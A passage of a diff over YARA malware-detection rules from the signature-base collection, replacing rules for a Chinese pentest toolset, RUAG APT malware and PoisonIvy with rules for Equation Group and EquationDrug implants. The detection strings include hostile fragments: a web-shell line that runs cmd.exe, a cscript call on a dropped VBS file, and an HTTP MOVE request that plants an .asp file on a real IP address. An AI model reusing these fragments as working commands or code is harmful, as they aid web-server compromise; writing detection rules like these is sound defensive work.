+		description = "Equation Group Malware - EquationLaser Installer"
 		author = "Florian Roth (Nextron Systems)"
-		id = "55dd10c9-f7dc-5ee2-a47d-dab8cc7b60e6"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_scripts.yar#L291-L306"
+		id = "15fd5668-36f2-556c-8150-225d3cbd4121"
+		date = "2015-02-16"
+		modified = "2025-03-29"
+		reference = "http://goo.gl/ivt8EW"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/spy_equation_fiveeyes.yar#L215-L236"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "5896b74158ef153d426fba76c2324cd9c261c709"
-		logic_hash = "a55be30fdb6598669d144308af5a9b6a21ab6140c75fdfc18cecf5d9add4a530"
-		score = 70
+		hash = "5e1f56c1e57fbff96d4999db1fd6dd0f7d8221df"
+		logic_hash = "6f8ba26f5efaa7ec422171862e1b645472387395f0be3a4625d58de5f0584c0b"
+		score = 80
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "for /d %i in (E:\\freehost\\*) do @echo %i" fullword ascii
-		$s1 = "/c \"C:\\windows\\temp\\cscript\" C:\\windows\\temp\\iis.vbs" fullword ascii
+		$s0 = "Failed to get Windows version" fullword ascii
+		$s1 = "lsasrv32.dll and lsass.exe" fullword wide
+		$s2 = "\\\\%s\\mailslot\\%s" fullword ascii
+		$s3 = "%d-%d-%d %d:%d:%d Z" fullword ascii
+		$s4 = "lsasrv32.dll" fullword ascii
+		$s6 = "%s %02x %s" fullword ascii
+		$s7 = "VIEWERS" fullword ascii
+		$s8 = "5.2.3790.220 (srv03_gdr.040918-1552)" fullword wide
 
 	condition:
-		filesize < 8KB and all of them
+		( uint16( 0 ) == 0x5a4d ) and filesize < 250000 and 6 of ( $s* )
 }
-rule SIGNATURE_BASE_CN_Honker_Portrecall_Bc : FILE
+rule SIGNATURE_BASE_Equation_Kaspersky_Fannyworm : FILE
 {
 	meta:
-		description = "Script from disclosed CN Honker Pentest Toolset - file bc.pl"
+		description = "Equation Group Malware - Fanny Worm"
 		author = "Florian Roth (Nextron Systems)"
-		id = "ea74f260-87e6-5027-b558-628949cae32a"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_scripts.yar#L308-L324"
+		id = "1b8d1ce6-8926-5aa3-8fba-6a8451d66a7d"
+		date = "2015-02-16"
+		modified = "2023-01-06"
+		reference = "http://goo.gl/ivt8EW"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/spy_equation_fiveeyes.yar#L238-L277"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "2084990406398afd856b2309c7f579d7d61c3767"
-		logic_hash = "f51644f195e42b91dae80ba1770aeb40790ea8528b6d09f5fed0f71d93bda5fc"
-		score = 70
+		hash = "1f0ae54ac3f10d533013f74f48849de4e65817a7"
+		logic_hash = "57e938ba1e53eeb99491547f53086eae3fc4d50bc5612e1b5ae6da6b029ac49e"
+		score = 80
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "print \"[*] Connected to remote host \\n\"; " fullword ascii
-		$s1 = "print \"Usage: $0 [Host] [Port] \\n\\n\";  " fullword ascii
-		$s5 = "print \"[*] Resolving HostName\\n\"; " fullword ascii
+		$s1 = "x:\\fanny.bmp" fullword ascii
+		$s2 = "32.exe" fullword ascii
+		$s3 = "d:\\fanny.bmp" fullword ascii
+		$x1 = "c:\\windows\\system32\\kernel32.dll" fullword ascii
+		$x2 = "System\\CurrentControlSet\\Services\\USBSTOR\\Enum" fullword ascii
+		$x3 = "System\\CurrentControlSet\\Services\\PartMgr\\Enum" fullword ascii
+		$x4 = "\\system32\\win32k.sys" wide
+		$x5 = "\\AGENTCPD.DLL" ascii
+		$x6 = "agentcpd.dll" fullword ascii
+		$x7 = "PADupdate.exe" fullword ascii
+		$x8 = "dll_installer.dll" fullword ascii
+		$x9 = "\\restore\\" ascii
+		$x10 = "Q:\\__?__.lnk" fullword ascii
+		$x11 = "Software\\Microsoft\\MSNetMng" fullword ascii
+		$x12 = "\\shelldoc.dll" ascii
+		$x13 = "file size = %d bytes" fullword ascii
+		$x14 = "\\MSAgent" ascii
+		$x15 = "Global\\RPCMutex" fullword ascii
+		$x16 = "Global\\DirectMarketing" fullword ascii
 
 	condition:
-		filesize < 10KB and all of them
+		( uint16( 0 ) == 0x5a4d ) and filesize < 300000 and ( ( 2 of ( $s* ) ) or ( 1 of ( $s* ) and 6 of ( $x* ) ) or ( 14 of ( $x* ) ) )
 }
-rule SIGNATURE_BASE_CN_Honker_Tuoku_Script_MSSQL_ : FILE
+rule SIGNATURE_BASE_Equation_Kaspersky_HDD_Reprogramming_Module : FILE
 {
 	meta:
-		description = "Script from disclosed CN Honker Pentest Toolset - file MSSQL_.asp"
+		description = "Equation Group Malware - HDD reprogramming module"
 		author = "Florian Roth (Nextron Systems)"
-		id = "35c4f119-6a57-580a-b5ee-c36af0ccc94a"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_scripts.yar#L326-L342"
+		id = "09ffe270-39e7-5225-b4a9-1c8d312a09c1"
+		date = "2015-02-16"
+		modified = "2025-03-29"
+		reference = "http://goo.gl/ivt8EW"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/spy_equation_fiveeyes.yar#L279-L297"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "7097c21f92306983add3b5b29a517204cd6cd819"
-		logic_hash = "4d721fd9711799cf3fd8ba6c300e270ed25faa2fb938ea01464e9bc9a3768e22"
-		score = 70
+		hash = "ff2b50f371eb26f22eb8a2118e9ab0e015081500"
+		logic_hash = "65800e5f122dce1dd4473bc8cebce0f9258b38d570118b154dbaf6939b68f925"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "GetLoginCookie = Request.Cookies(Cookie_Login)" fullword ascii
-		$s2 = "if ShellPath=\"\" Then ShellPath = \"c:\\\\windows\\\\system32\\\\cmd.exe\"" fullword ascii
-		$s8 = "Set DD=CM.exec(ShellPath&\" /c \"&DefCmd)" fullword ascii
+		$s0 = "nls_933w.dll" fullword ascii
+		$s1 = "BINARY" fullword wide
+		$s2 = "KfAcquireSpinLock" fullword ascii
+		$s3 = "HAL.dll" fullword ascii
+		$s4 = "READ_REGISTER_UCHAR" fullword ascii
 
 	condition:
-		filesize < 100KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 300000 and all of ( $s* )
 }
-rule SIGNATURE_BASE_CN_Honker_Nc_MOVE : FILE
+rule SIGNATURE_BASE_Equation_Kaspersky_EOP_Package : FILE
 {
 	meta:
-		description = "Script from disclosed CN Honker Pentest Toolset - file MOVE.txt"
+		description = "Equation Group Malware - EoP package and malware launcher"
 		author = "Florian Roth (Nextron Systems)"
-		id = "115d1ec9-6c4f-587e-977c-cd24ada89ab6"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_scripts.yar#L344-L360"
+		id = "2eb97873-a415-57be-a8fb-70ef86a99c9b"
+		date = "2015-02-16"
+		modified = "2025-03-29"
+		reference = "http://goo.gl/ivt8EW"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/spy_equation_fiveeyes.yar#L299-L318"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "4195370c103ca467cddc8f2724a8e477635be424"
-		logic_hash = "49f41162919bb04744041ae6f7438e61d98fb7d5984a17535d9c4ce4d398671b"
-		score = 70
+		hash = "2bd1b1f5b4384ce802d5d32d8c8fd3d1dc04b962"
+		logic_hash = "abbc562b8e822422ae1852a5675a680e797a6af0be5581a8482785bd0c1ad1bf"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "Destination: http://202.113.20.235/gj/images/2.asp" fullword ascii
-		$s1 = "HOST: 202.113.20.235" fullword ascii
-		$s2 = "MOVE /gj/images/A.txt HTTP/1.1" fullword ascii
+		$s0 = "abababababab" fullword ascii
+		$s1 = "abcdefghijklmnopq" fullword ascii
+		$s2 = "@STATIC" fullword wide
+		$s3 = "$aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" fullword ascii
+		$s4 = "@prkMtx" fullword wide
+		$s5 = "prkMtx" fullword wide
+		$s6 = "cnFormVoidFBC" fullword wide
 
 	condition:
-		filesize < 1KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 100000 and all of ( $s* )
 }
-rule SIGNATURE_BASE_CN_Honker_Mssqlpw_Scan : FILE
+rule SIGNATURE_BASE_Equation_Kaspersky_Triplefantasy_Loader : FILE
 {
 	meta:
-		description = "Script from disclosed CN Honker Pentest Toolset - file mssqlpw scan.txt"
+		description = "Equation Group Malware - TripleFantasy Loader"
 		author = "Florian Roth (Nextron Systems)"
-		id = "7dc29d06-e1e7-527f-b9e5-d75f660fd73e"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_scripts.yar#L362-L377"
+		id = "562e7855-f011-5985-91c0-622b2fec32f8"
+		date = "2015-02-16"
+		modified = "2025-03-29"
+		reference = "http://goo.gl/ivt8EW"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/spy_equation_fiveeyes.yar#L320-L342"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "e49def9d72bfef09a639ef3f7329083a0b8b151c"
-		logic_hash = "eb3bd38ca317f0b10358581fc3dbb8ca81b991b9a4f4f2d256d81a31028411b9"
-		score = 70
+		hash = "4ce6e77a11b443cc7cbe439b71bf39a39d3d7fa3"
+		logic_hash = "f49735a587085e95f1a8e405e42e5ff3eb4beda1f26c7b4c3c0a33bec21f48c7"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "response.Write(\"I Get it ! Password is <font color=red>\" & str & \"</font><BR>" ascii
-		$s1 = "response.Write \"Done!<br>Process \" & tTime & \" s\"" fullword ascii
+		$x1 = "Original Innovations, LLC" fullword wide
+		$x2 = "Moniter Resource Protocol" fullword wide
+		$x3 = "ahlhcib.dll" fullword wide
+		$s0 = "hnetcfg.HNetGetSharingServicesPage" fullword ascii
+		$s1 = "hnetcfg.IcfGetOperationalMode" fullword ascii
+		$s2 = "hnetcfg.IcfGetDynamicFwPorts" fullword ascii
+		$s3 = "hnetcfg.HNetFreeFirewallLoggingSettings" fullword ascii
+		$s4 = "hnetcfg.HNetGetShareAndBridgeSettings" fullword ascii
+		$s5 = "hnetcfg.HNetGetFirewallSettingsPage" fullword ascii
 
 	condition:
-		filesize < 6KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 50000 and ( all of ( $x* ) and all of ( $s* ) )
 }
-rule SIGNATURE_BASE_RUAG_Tavdig_Malformed_Executable : FILE
+rule SIGNATURE_BASE_Equation_Kaspersky_Suspiciousstring : FILE
 {
 	meta:
-		description = "Detects an embedded executable with a malformed header - known from Tavdig malware"
+		description = "Equation Group Malware - suspicious string found in sample"
 		author = "Florian Roth (Nextron Systems)"
-		id = "da6357d4-0cdb-5f30-9919-59858963cc41"
-		date = "2023-12-05"
-		modified = "2023-12-05"
-		reference = "https://goo.gl/N5MEj0"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_ruag.yar#L9-L19"
+		id = "a5f203a7-0c50-5658-89f4-44533ed4eef0"
+		date = "2015-02-17"
+		modified = "2025-03-29"
+		reference = "http://goo.gl/ivt8EW"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/spy_equation_fiveeyes.yar#L346-L364"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "2a6eb90cc77f4556da0b5b0211bf0c4759dae0d78e9c6b765eff0e9a34f52e0f"
+		logic_hash = "dd7f72c2263a3af9b8c9072b415a3b066e821e000b52ddd684ecb6b80a99067a"
 		score = 60
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+
+	strings:
+		$s1 = "i386\\DesertWinterDriver.pdb" fullword
+		$s2 = "Performing UR-specific post-install..."
+		$s3 = "Timeout waiting for the \"canInstallNow\" event from the implant-specific EXE!"
+		$s4 = "STRAITSHOOTER30.exe"
+		$s5 = "standalonegrok_2.1.1.1"
+		$s6 = "c:\\users\\rmgree5\\"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and uint32( uint32( 0x3C ) ) == 0x0000AD0B
+		uint16( 0 ) == 0x5a4d and filesize < 500000 and all of ( $s* )
 }
-rule SIGNATURE_BASE_RUAG_Bot_Config_File : FILE
+rule SIGNATURE_BASE_Equationdrug_Networksniffer1
 {
 	meta:
-		description = "Detects a specific config file used by malware in RUAG APT case"
+		description = "EquationDrug - Backdoor driven by network sniffer - mstcp32.sys, fat32.sys"
 		author = "Florian Roth (Nextron Systems)"
-		id = "aa3d5f9e-0b23-5180-9e52-a7d705712747"
-		date = "2023-12-05"
-		modified = "2023-12-05"
-		reference = "https://goo.gl/N5MEj0"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_ruag.yar#L21-L34"
+		id = "21a500e7-3011-50e6-b685-f4f65d6dee17"
+		date = "2015-03-11"
+		modified = "2023-01-06"
+		reference = "http://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-platform/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/spy_equation_fiveeyes.yar#L368-L388"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "256808511233da446ec69db4f5a5e23a237296c100e79e78bbe5e4964fa5dde6"
-		score = 60
-		quality = 85
-		tags = "FILE"
+		hash = "26e787997a338d8111d96c9a4c103cf8ff0201ce"
+		logic_hash = "ec90cba3b790c52f475a08b586f5af5a88ec46cfcf8abd74435981a34dfdb3f7"
+		score = 75
+		quality = 35
+		tags = ""
 
 	strings:
-		$s1 = "[CONFIG]" ascii
-		$s2 = "name = " ascii
-		$s3 = "exe = cmd.exe" ascii
+		$s0 = "Microsoft(R) Windows (TM) Operating System" fullword wide
+		$s1 = "\\Registry\\User\\CurrentUser\\" wide
+		$s3 = "sys\\mstcp32.dbg" fullword ascii
+		$s7 = "mstcp32.sys" fullword wide
+		$s8 = "p32.sys" fullword ascii
+		$s9 = "\\Device\\%ws_%ws" wide
+		$s10 = "\\DosDevices\\%ws" wide
+		$s11 = "\\Device\\%ws" wide
 
 	condition:
-		uint32( 0 ) == 0x4e4f435b and $s1 at 0 and $s2 and $s3 and filesize < 160
+		all of them
 }
-rule SIGNATURE_BASE_RUAG_Cobra_Malware : FILE
+rule SIGNATURE_BASE_Equationdrug_Compatlayer_Unilaydll : FILE
 {
 	meta:
-		description = "Detects a malware mentioned in the RUAG Case called Carbon/Cobra"
-		author = "Florian Roth (Nextron Systems)"
-		id = "dd2d591f-6f56-5c31-9f3c-3aa7d174c9a0"
-		date = "2023-12-05"
-		modified = "2023-12-05"
-		reference = "https://goo.gl/N5MEj0"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_ruag.yar#L36-L47"
+		description = "EquationDrug - Unilay.DLL"
+		author = "Florian Roth (Nextron Systems) @4nc4p"
+		id = "32fd31c7-cc44-50e1-8888-b9da59ce587b"
+		date = "2015-03-11"
+		modified = "2025-03-29"
+		reference = "http://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-platform/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/spy_equation_fiveeyes.yar#L390-L402"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "5576e8e465eb289e8da44009cb2237080c5b5c3eb6d7a337634d91c5d68ecd80"
-		score = 60
+		hash = "a3a31937956f161beba8acac35b96cb74241cd0f"
+		logic_hash = "86434bd0456ea0c9ac9ed74dc3cf63520eb6b880dd4ea7920d0e82873dfec21e"
+		score = 75
 		quality = 85
 		tags = "FILE"
 
 	strings:
-		$s1 = "\\Cobra\\Release\\Cobra.pdb" ascii
+		$s0 = "unilay.dll" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and $s1
+		uint16( 0 ) == 0x5a4d and $s0
 }
-rule SIGNATURE_BASE_RUAG_Cobra_Config_File : FILE
+rule SIGNATURE_BASE_Equationdrug_Networksniffer2
 {
 	meta:
-		description = "Detects a config text file used by malware Cobra in RUAG case"
-		author = "Florian Roth (Nextron Systems)"
-		id = "b3899d95-acc9-55ca-9025-edecce755ca6"
-		date = "2023-12-05"
-		modified = "2023-12-05"
-		reference = "https://goo.gl/N5MEj0"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_ruag.yar#L49-L71"
+		description = "EquationDrug - Network Sniffer - tdip.sys"
+		author = "Florian Roth (Nextron Systems) @4nc4p"
+		id = "afc5ae23-4965-5796-af3b-9e2705aea455"
+		date = "2015-03-11"
+		modified = "2025-03-29"
+		reference = "http://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-platform/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/spy_equation_fiveeyes.yar#L419-L438"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "703a89562f3a2e5692883892f468288276459ad528cd371b1ac226e1d1c4be02"
-		score = 60
-		quality = 85
-		tags = "FILE"
+		hash = "7e3cd36875c0e5ccb076eb74855d627ae8d4627f"
+		logic_hash = "d29744a801194e5488795a8167965b94290be477efe478ee3e71c4bc98733967"
+		score = 75
+		quality = 35
+		tags = ""
 
 	strings:
-		$h1 = "[NAME]" ascii
-		$s1 = "object_id=" ascii
-		$s2 = "[TIME]" ascii fullword
-		$s3 = "lastconnect" ascii
-		$s4 = "[CW_LOCAL]" ascii fullword
-		$s5 = "system_pipe" ascii
-		$s6 = "user_pipe" ascii
-		$s7 = "[TRANSPORT]" ascii
-		$s8 = "run_task_system" ascii
-		$s9 = "[WORKDATA]" ascii
-		$s10 = "address1" ascii
+		$s0 = "Microsoft(R) Windows (TM) Operating System" fullword wide
+		$s1 = "IP Transport Driver" fullword wide
+		$s2 = "tdip.sys" fullword wide
+		$s3 = "sys\\tdip.dbg" fullword ascii
+		$s4 = "dip.sys" fullword ascii
+		$s5 = "\\Device\\%ws_%ws" wide
+		$s6 = "\\DosDevices\\%ws" wide
+		$s7 = "\\Device\\%ws" wide
 
 	condition:
-		uint32( 0 ) == 0x4d414e5b and $h1 at 0 and 8 of ( $s* ) and filesize < 5KB
+		all of them
 }
-rule SIGNATURE_BASE_RUAG_Exfil_Config_File : FILE
+rule SIGNATURE_BASE_Equationdrug_Networksniffer3
 {
 	meta:
-		description = "Detects a config text file used in data exfiltration in RUAG case"
-		author = "Florian Roth (Nextron Systems)"
-		id = "7057bc7b-7f8c-5db8-b7f3-f6c33487b122"
-		date = "2023-12-05"
-		modified = "2023-12-05"
-		reference = "https://goo.gl/N5MEj0"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_ruag.yar#L73-L90"
+		description = "EquationDrug - Network Sniffer - tdip.sys"
+		author = "Florian Roth (Nextron Systems) @4nc4p"
+		id = "c6b1658b-cbc6-535a-a3a2-15ce3cf6e4f6"
+		date = "2015-03-11"
+		modified = "2025-03-29"
+		reference = "http://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-platform/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/spy_equation_fiveeyes.yar#L440-L455"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "379e8762932ca565f3bd35ec241aef2d0445fbe6182a041e4d4e16a1170202ef"
-		score = 60
+		hash = "14599516381a9646cd978cf962c4f92386371040"
+		logic_hash = "18c516fe0cd74e7a02ee15260abf3d27bba992492e6042a148abdee3086a9a00"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 
 	strings:
-		$h1 = "[TRANSPORT]" ascii
-		$s1 = "system_pipe" ascii
-		$s2 = "spstatus" ascii
-		$s3 = "adaptable" ascii
-		$s4 = "post_frag" ascii
-		$s5 = "pfsgrowperiod" ascii
+		$s0 = "Corporation. All rights reserved." fullword wide
+		$s1 = "IP Transport Driver" fullword wide
+		$s2 = "tdip.sys" fullword wide
+		$s3 = "tdip.pdb" fullword ascii
 
 	condition:
-		uint32( 0 ) == 0x4152545b and $h1 at 0 and all of ( $s* ) and filesize < 1KB
+		all of them
 }
-rule SIGNATURE_BASE_Poisonivy_Generic_3 : FILE
+rule SIGNATURE_BASE_Equationdrug_Volrec_Driver
 {
 	meta:
-		description = "PoisonIvy RAT Generic Rule"
-		author = "Florian Roth (Nextron Systems)"
-		id = "0f6a47ee-b741-59cc-b2d6-6bf3989ce8e7"
-		date = "2015-05-14"
-		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_poisonivy_gen3.yar#L2-L32"
+		description = "EquationDrug - Collector plugin for Volrec - msrstd.sys"
+		author = "Florian Roth (Nextron Systems) @4nc4p"
+		id = "db4f3f65-bdc4-565d-ad59-25a16ec7c9d2"
+		date = "2015-03-11"
+		modified = "2025-03-29"
+		reference = "http://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-platform/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/spy_equation_fiveeyes.yar#L457-L471"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "e1cbdf740785f97c93a0a7a01ef2614be792afcd"
-		logic_hash = "8116b07c00218a0e9784447f322455ff24ae754770b85db760b1c397e10e5695"
+		hash = "ee2b504ad502dc3fed62d6483d93d9b1221cdd6c"
+		logic_hash = "24b8202a8590ddb1dd76e01499d02282ad40a6fd6f6b9020040381a370e91f40"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = ""
 
 	strings:
-		$k1 = "Tiger324{" fullword ascii
-		$s2 = "WININET.dll" fullword ascii
-		$s3 = "mscoree.dll" fullword wide
-		$s4 = "WS2_32.dll" fullword
-		$s5 = "Explorer.exe" fullword wide
-		$s6 = "USER32.DLL"
-		$s7 = "CONOUT$"
-		$s8 = "login.asp"
-		$h1 = "HTTP/1.0"
-		$h2 = "POST"
-		$h3 = "login.asp"
-		$h4 = "check.asp"
-		$h5 = "result.asp"
-		$h6 = "upload.asp"
+		$s0 = "msrstd.sys" fullword wide
+		$s1 = "msrstd.pdb" fullword ascii
+		$s2 = "msrstd driver" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 500KB and ( $k1 or all of ( $s* ) or all of ( $h* ) )
+		all of them
 }
-rule SIGNATURE_BASE_Win32_Buzus_Softpulse : FILE
+rule SIGNATURE_BASE_Equationdrug_Kernelrootkit
 {
 	meta:
-		description = "Trojan Buzus / Softpulse"
+		description = "EquationDrug - Kernel mode stage 0 and rootkit (Windows 2000 and above) - msndsrv.sys"
 		author = "Florian Roth (Nextron Systems)"
-		id = "3b555916-030a-5773-b2f1-e995fc81b697"
-		date = "2015-05-13"
-		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_buzus_softpulse.yar#L2-L26"
+		id = "92491e30-4041-5c8b-8e4e-7bc2b1d3234b"
+		date = "2015-03-11"
+		modified = "2023-01-06"
+		reference = "http://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-platform/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/spy_equation_fiveeyes.yar#L473-L493"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "2f6df200e63a86768471399a74180466d2e99ea9"
-		logic_hash = "49625594db57e9d629860970c20493b76e554addc2edb41adba64673a820a94b"
+		hash = "597715224249e9fb77dc733b2e4d507f0cc41af6"
+		logic_hash = "4b41af8656ada1b4db7ec11f65aeb2d335f424d8557cfa74a064b40c65627012"
 		score = 75
-		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		quality = 60
+		tags = ""
 
 	strings:
-		$x1 = "pi4izd6vp0.com" fullword ascii
-		$s1 = "SELECT * FROM Win32_Process" fullword wide
-		$s4 = "CurrentVersion\\Uninstall\\avast" fullword wide
-		$s5 = "Find_RepeatProcess" fullword ascii
-		$s6 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\" wide
-		$s7 = "myapp.exe" fullword ascii
-		$s14 = "/c ping -n 1 www.google" wide
+		$s0 = "Microsoft(R) Windows (TM) Operating System" fullword wide
+		$s1 = "Parmsndsrv.dbg" fullword ascii
+		$s2 = "\\Registry\\User\\CurrentUser\\" wide
+		$s3 = "msndsrv.sys" fullword wide
+		$s5 = "\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Control\\Windows" wide
+		$s6 = "\\Device\\%ws_%ws" wide
+		$s7 = "\\DosDevices\\%ws" wide
+		$s9 = "\\Device\\%ws" wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( ( $x1 and 2 of ( $s* ) ) or all of ( $s* ) )
+		all of them
 }
-rule SIGNATURE_BASE_Susp_Indicators_EXE : FILE
+rule SIGNATURE_BASE_Equationdrug_Keylogger
 {
 	meta:
-		description = "Detects packed NullSoft Inst EXE with characteristics of NetWire RAT"
-		author = "Florian Roth (Nextron Systems)"
-		id = "b4015c24-d18e-51eb-9854-8cc0e6dba4d0"
-		date = "2018-01-05"
-		modified = "2023-12-05"
-		reference = "https://pastebin.com/8qaiyPxs"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_netwire_rat.yar#L11-L30"
+		description = "EquationDrug - Key/clipboard logger driver - msrtvd.sys"
+		author = "Florian Roth (Nextron Systems) @4nc4p"
+		id = "57b6af34-577b-58ec-9a9e-91911c32270b"
+		date = "2015-03-11"
+		modified = "2025-03-29"
+		reference = "http://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-platform/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/spy_equation_fiveeyes.yar#L495-L510"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "9cb66435b78893daa5583475b14f0df2a5e8612f3aaf5cb02160991ab4d57d1b"
-		score = 60
+		hash = "b93aa17b19575a6e4962d224c5801fb78e9a7bb5"
+		logic_hash = "b5db0e6e24979b07cd180fed11545daef281e7b0858a7de001a83c2cbc186557"
+		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "6de7f0276afa633044c375c5c630740af51e29b6a6f17a64fbdd227c641727a4"
+		tags = ""
 
 	strings:
-		$s1 = "Software\\Microsoft\\Windows\\CurrentVersion"
-		$s2 = "Error! Bad token or internal error" fullword ascii
-		$s3 = "CRYPTBASE" fullword ascii
-		$s4 = "UXTHEME" fullword ascii
-		$s5 = "PROPSYS" fullword ascii
-		$s6 = "APPHELP" fullword ascii
